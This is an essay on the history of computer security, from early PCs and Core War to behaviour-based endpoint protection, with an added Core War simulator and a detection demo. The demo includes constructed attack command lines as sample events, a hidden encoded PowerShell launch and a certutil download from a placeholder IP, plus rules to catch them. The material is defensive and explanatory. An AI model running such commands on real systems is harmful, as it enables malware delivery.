I can still remember waiting with excitement for my first IBM PC-XT clone to arrive. It was 1986 and I was newly arrived in the US doing some contracting for American Airlines. I couldn’t wait to get the large (and incredibly heavy) box open. Within a few minutes I had everything connected and plugged in. Switching it on I also remember being slightly underwhelmed by the ‘C:\>_’ prompt sitting quietly on the screen. No Windows, no pre-installed applications, just Microsoft Disk Operating System (MS-DOS), setting Bill Gates on the way to his first million.
In retrospect my personal computer was never safer than in those days when it sat on my dining table in my small apartment in Tulsa. The success of the 1983 film WarGames introduced the idea of breaking into computers remotely to a wider audience. In response to this emerging threat the US passed the Computer Fraud and Abuse Act in 1986, among the first laws written specifically for the age of the hacker.
With the introduction of a Personal Computer from IBM, then the giant of the industry, the corporate world had a de facto standard. Competitors were an eclectic selection of devices, mostly from companies that no longer exist. Adoption was rapid and global. The next logical step was to connect these new resources together within the company, and the concept of the local area network (LAN) was born. Again IBM tried to dominate, with its Token Ring technology, but in the end the competing Ethernet standard won out.
Next came the results of a US Defense Advanced Research Projects Agency (DARPA) initiative, ARPANET, which evolved into what we now know as the Internet. Now we had PCs connected within companies and companies connected to each other; what could possibly go wrong?
Programs that would do more than take input and provide output were already being imagined in the 1970s by the original hackers of the mainframe era. These ideas were made concrete in Core War, a game devised by D. G. Jones and A. K. Dewdney and described by Dewdney in Scientific American in 1984. Two programs, written in a special assembly language called Redcode, were loaded into a simulated machine and took turns executing one instruction at a time, each trying to overwrite the other's memory cells with instructions that would halt it. Before long warriors appeared that scanned the core for the opposition, or replicated themselves to improve their odds of survival. These and other tactics, in more sophisticated form, would become the tools of attackers in the internet age. The creators of the game took their inspiration from Creeper, a self-replicating program written by Bob Thomas, and from a later program, Reaper, that hunted down and deleted copies of Creeper.
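To make the mechanics of that game concrete, here is a cut-down Core War simulator. It is an added example, not code from the original article or from Dewdney's MARS; it implements only the handful of Redcode instructions needed by two classic public-domain warriors from the 1984 article, the Imp (which copies itself one cell ahead and moves into the copy forever) and the Dwarf (which drops DAT "bombs" every fourth cell). The core size of 800 cells and the load addresses are assumptions chosen so the outcome is easy to trace by hand.

```python
"""Minimal Core War simulator (a cut-down MARS) for the 1984 Redcode game.

Supports the subset of Redcode '88 needed for two classic public-domain
warriors from Dewdney's article: the Imp (MOV 0, 1), which copies itself one
cell ahead and moves into the copy forever, and the Dwarf, which drops DAT
'bombs' every fourth cell around the core. Executing a DAT kills a process.
"""
from dataclasses import dataclass, replace

CORE_SIZE = 800   # assumption: a small core; the original game used 8000 cells


@dataclass
class Instr:
    op: str        # DAT, MOV, ADD or JMP
    a_mode: str    # '#' immediate, '$' direct, '@' indirect (via the B-field)
    a: int
    b_mode: str
    b: int


def parse_operand(tok):
    mode = tok[0] if tok[0] in '#$@' else '$'
    return mode, int(tok.lstrip('#$@'))


def parse(line):
    """Parse one Redcode line such as 'MOV 2, @2'; one-operand forms allowed."""
    op, _, rest = line.strip().upper().partition(' ')
    toks = [t.strip() for t in rest.split(',') if t.strip()]
    if len(toks) == 1:                 # 'JMP -2' fills the A field, 'DAT 0' the B field
        toks = ['#0', toks[0]] if op == 'DAT' else [toks[0], '#0']
    (am, a), (bm, b) = parse_operand(toks[0]), parse_operand(toks[1])
    return Instr(op, am, a, bm, b)


def resolve(core, pc, mode, offset):
    """Turn an operand into an absolute core address (all addressing is relative)."""
    addr = (pc + offset) % CORE_SIZE
    if mode == '@':                    # indirect: follow the B-field of the pointed-to cell
        addr = (addr + core[addr].b) % CORE_SIZE
    return addr


def step(core, pc):
    """Execute core[pc]; return the next pc, or None if the process died."""
    ins = core[pc]
    if ins.op == 'DAT':
        return None
    a_addr = resolve(core, pc, ins.a_mode, ins.a)
    b_addr = resolve(core, pc, ins.b_mode, ins.b)
    if ins.op == 'MOV':                # copy a whole cell (or an immediate into a B-field)
        if ins.a_mode == '#':
            core[b_addr].b = ins.a
        else:
            core[b_addr] = replace(core[a_addr])
    elif ins.op == 'ADD':              # an immediate A adds to the target's B-field
        if ins.a_mode == '#':
            core[b_addr].b = (core[b_addr].b + ins.a) % CORE_SIZE
        else:
            core[b_addr].a = (core[b_addr].a + core[a_addr].a) % CORE_SIZE
            core[b_addr].b = (core[b_addr].b + core[a_addr].b) % CORE_SIZE
    elif ins.op == 'JMP':
        return a_addr
    else:
        raise ValueError(f'unsupported opcode {ins.op}')
    return (pc + 1) % CORE_SIZE


IMP = ['MOV 0, 1']
DWARF = ['ADD #4, 3', 'MOV 2, @2', 'JMP -2', 'DAT #0, #0']


def battle(warriors, max_rounds=10000):
    """warriors: list of (name, source_lines, load_address).

    Each round every live warrior executes one instruction in turn.
    Returns (winner_name, rounds), with winner_name None for a draw."""
    core = [Instr('DAT', '#', 0, '#', 0) for _ in range(CORE_SIZE)]
    procs = []
    for name, src, base in warriors:
        for i, line in enumerate(src):
            core[(base + i) % CORE_SIZE] = parse(line)
        procs.append([name, base])
    for rnd in range(1, max_rounds + 1):
        for proc in list(procs):
            proc[1] = step(core, proc[1])
            if proc[1] is None:        # executed a DAT: process dies
                procs.remove(proc)
        if len(procs) <= 1:
            return (procs[0][0] if procs else None), rnd
    return None, max_rounds


if __name__ == '__main__':
    print(battle([('Dwarf', DWARF, 0), ('Imp', IMP, 10)]))          # ('Dwarf', 14)
    print(battle([('Imp A', IMP, 10), ('Imp B', IMP, 400)], 100))    # (None, 100)
```

With the Dwarf at cell 0 and the Imp at cell 10, the Dwarf's fifth bomb lands on cell 23 in the same round that the Imp has just copied itself there, so the Imp executes a DAT and dies in round 14. Two Imps, by contrast, never harm each other and the bout is a draw; that is why later warriors added scanning and replication rather than relying on blind bombing.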
In those heady days of the ARPANET the developers of TCP/IP, the communications protocol suite that underpins the internet, envisaged a world where information was freely exchanged. Universities were the first institutions to be connected this way and academics enjoyed this new and convenient way to communicate. But here we have the first warning sign of what was to come. The same talented individuals who developed the means to communicate so easily gave little thought to security. The brief given them by the military was for a network that would be resilient to disruption by an enemy. That requirement led the designers to break data into packets to be reassembled at the destination, with the ability to route around failed links built in. Other aspects of security, such as authentication, authorisation and protection of data in transit (encryption), were not priorities, and were bolted on decades later (IPsec, TLS) rather than designed in.
Back in the early days of personal computing, before I had saved enough for my PC clone, I had a BBC Micro. Already employed as a systems programmer, I enjoyed nothing more than overcoming the protection software on early games. Games were loaded from a cassette player, and it was possible to trace them byte by byte, first to understand and then to defeat the copy protection. It was enough to solve the puzzle and I didn't go into the 'warez' business of pirating software, but this was another indication of the difficulty of protecting software.
If we jump to the 1990s, the hacking and cracking scene was really taking off. I was working in San Francisco at the time Kevin Mitnick was on the run from the FBI for, among other things, stealing proprietary software for Nokia mobile phones. The story was big news and demonstrated the difficulty of tracking a wily hacker in the new age of mobile communications. It also highlighted both the lack of awareness of the scale of computer security issues and the lack of skills in law enforcement. In fact, without the assistance of Tsutomu Shimomura, a computational physicist at the San Diego Supercomputer Center whose systems Mitnick had penetrated, the FBI might not have caught him at all.
On the home front we now had anti-virus (AV) software we could install on our PCs to look for malicious software and remove it. This was at least an overdue recognition that the bad actors were winning. Jump again into the noughties and the internet has proved so successful that business is moving wholesale to colonise this new frontier. Amazon becomes a household name, synonymous with online shopping in general, not just books. With the convenience of online commerce came new problems. Transactions needed to be protected, and identifying the purchaser became vital. This produced a new commodity to be traded among criminals: online identities. There was a saying in the early days of the net, the caption of a 1993 New Yorker cartoon, that "On the Internet, nobody knows you're a dog", and criminals quickly realised that with a few key pieces of personal data they could easily adopt your persona and run up debts, apply for loans or buy things with your credit card details.
Jumping again to the last decade, there have been improvements in companies' approaches to computer security, specialist units in law enforcement and an explosion of private companies offering products and services to help secure our systems. Unfortunately there is another adage in the IT security world: the attacker only needs to succeed once to compromise a system, while the defenders of that system must succeed against every attempt, all the time. Such is the current level of sophistication among attackers, whether organised crime groups or nation-state actors, that traditional signature-based methods alone no longer suffice. Like the arms race of the Cold War, the same tensions exist in cyberspace.
I would still argue that our home computer is a more appropriate tool for conducting our online activities than a proprietary mobile device. Your Apple or Android phone or tablet is a largely closed world. Despite being simply a very small computer with a different interface, a mobile device leaves its average user totally reliant on the manufacturer for security. The computer or laptop user does at least have an interface through which they can exert more complete control over their device. But even those using full-size computers need to be aware that not only is it impossible to blindly trust our software, it is also impossible to trust the hardware it is running on.
Edward Snowden showed us that the NSA is not above intercepting lawful deliveries of third-party hardware (Cisco routers in this case) in order to tamper with them, inserting modified firmware or additional hardware that provides remote access to the devices. The US has itself reported similar tampering: routine checks of chips manufactured in China turned up circuits additional to those in the US designs. No nefarious purpose could be determined for these spurious additions, but suspicions were aroused. There is a market among security-conscious (some might say paranoid) people for older IBM ThinkPad laptops with 'known' unaltered hardware and an open source BIOS such as Libreboot. The machines are sold with an open source OS and open source BIOS (source code for both supplied) on verified hardware, meaning you can 'trust' that your system has not been modified. I have two such laptops: one is never online and holds my password vault with all my online passwords, and the other is a backup.
In the corporate world the defence of secrets and proprietary data now requires the use of AI in some form or other. Endpoint protection (EPP) systems have largely replaced traditional AV. Whereas an AV scanner requires prior knowledge of a threat, a recognisable 'signature' it can look for, EPP systems do not; they rely on the behaviour of software and users on a system to identify suspicious actions. They draw on the MITRE ATT&CK framework, a knowledge base of the tactics and techniques observed in real-world intrusions, which breaks an attack down into identifiable steps. Those steps can then be recognised by machine learning (ML) algorithms, usually operating in the cloud. A few years ago in Las Vegas, DARPA's Cyber Grand Challenge (held alongside DEF CON in 2016) pitted fully automated systems against each other, each exploiting flaws in its opponents' software while patching its own, with no human in the loop. Echoes of William Gibson's novel Neuromancer.
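The difference between the two approaches is easiest to see in code. The following is an added example, not anything from the original article or from any EPP vendor: a hash-based "signature" check sitting beside two behavioural rules keyed to ATT&CK technique IDs (T1059.001, Command and Scripting Interpreter: PowerShell; T1105, Ingress Tool Transfer), run over constructed process-creation events. The sample bytes, the event records, the IP address (from the 198.51.100.0/24 documentation range) and the rules themselves are all constructed for illustration; a real product uses far richer telemetry and ML models rather than two hand-written predicates.

```python
"""Signature vs behaviour: a hash blocklist misses a trivially repacked sample,
while behavioural rules keyed to ATT&CK techniques still fire.

Everything below (samples, events, rules) is constructed for illustration.
"""
import base64
import hashlib

# --- Signature-based detection (classic AV) ---------------------------------
KNOWN_BAD = b'MZ\x90\x00constructed dropper sample v1'   # constructed, not real malware
REPACKED = KNOWN_BAD + b'\x00'     # one byte of padding: same behaviour, new hash
SIGNATURES = {hashlib.sha256(KNOWN_BAD).hexdigest()}


def signature_match(blob):
    """True only if this exact byte sequence was seen and catalogued before."""
    return hashlib.sha256(blob).hexdigest() in SIGNATURES


# --- Behaviour-based detection (EPP/EDR style) ------------------------------
OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}


def has_encoded_command(cmdline):
    """powershell.exe accepts any unique prefix of -EncodedCommand (-e, -enc, ...),
    so match on prefix rather than the full switch name to avoid trivial evasion."""
    for tok in cmdline.lower().split():
        if tok.startswith('-') and len(tok) > 1 and 'encodedcommand'.startswith(tok[1:]):
            return True
    return False


# (technique_id, description, predicate over one process-creation event)
RULES = [
    ('T1059.001', 'Office application spawning PowerShell with an encoded command',
     lambda e: e['parent'] in OFFICE_APPS and e['image'] == 'powershell.exe'
               and has_encoded_command(e['cmdline'])),
    ('T1105', 'certutil used to fetch a remote file',
     lambda e: e['image'] == 'certutil.exe' and '-urlcache' in e['cmdline'].lower()),
]


def behaviour_alerts(events):
    """Return (technique_id, event_index) for every event that matches a rule."""
    return [(tid, i) for i, e in enumerate(events)
            for tid, _desc, pred in RULES if pred(e)]


# Constructed process-creation events: parent image, child image, command line.
ENCODED = base64.b64encode('Write-Host hello'.encode('utf-16-le')).decode()
EVENTS = [
    {'parent': 'explorer.exe', 'image': 'winword.exe',
     'cmdline': 'winword.exe invoice.docx'},
    {'parent': 'winword.exe', 'image': 'powershell.exe',
     'cmdline': f'powershell.exe -nop -w hidden -enc {ENCODED}'},
    {'parent': 'cmd.exe', 'image': 'certutil.exe',
     'cmdline': 'certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe'},
    {'parent': 'explorer.exe', 'image': 'powershell.exe',
     'cmdline': 'powershell.exe Get-ChildItem'},
]

if __name__ == '__main__':
    print('signature hits:', signature_match(KNOWN_BAD), signature_match(REPACKED))  # True False
    print('behaviour alerts:', behaviour_alerts(EVENTS))  # [('T1059.001', 1), ('T1105', 2)]
```

The signature catches the catalogued sample and nothing else: appending a single byte defeats it. The behavioural rules do not care what the binary looks like; they flag a word processor launching PowerShell with an encoded payload and a signed system utility being used as a downloader, while the analyst's own interactive PowerShell session (event 3) passes untouched.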
Home working and home schooling in these unusual times make us all part of a huge network-based enterprise. We need the flexibility and relative transparency of the traditional home PC or laptop rather than the more limited, proprietary and opaque mobile devices.
(First published as 'From WarGames to WFH' in the British Computer Society's magazine ITNow, Summer 2021.)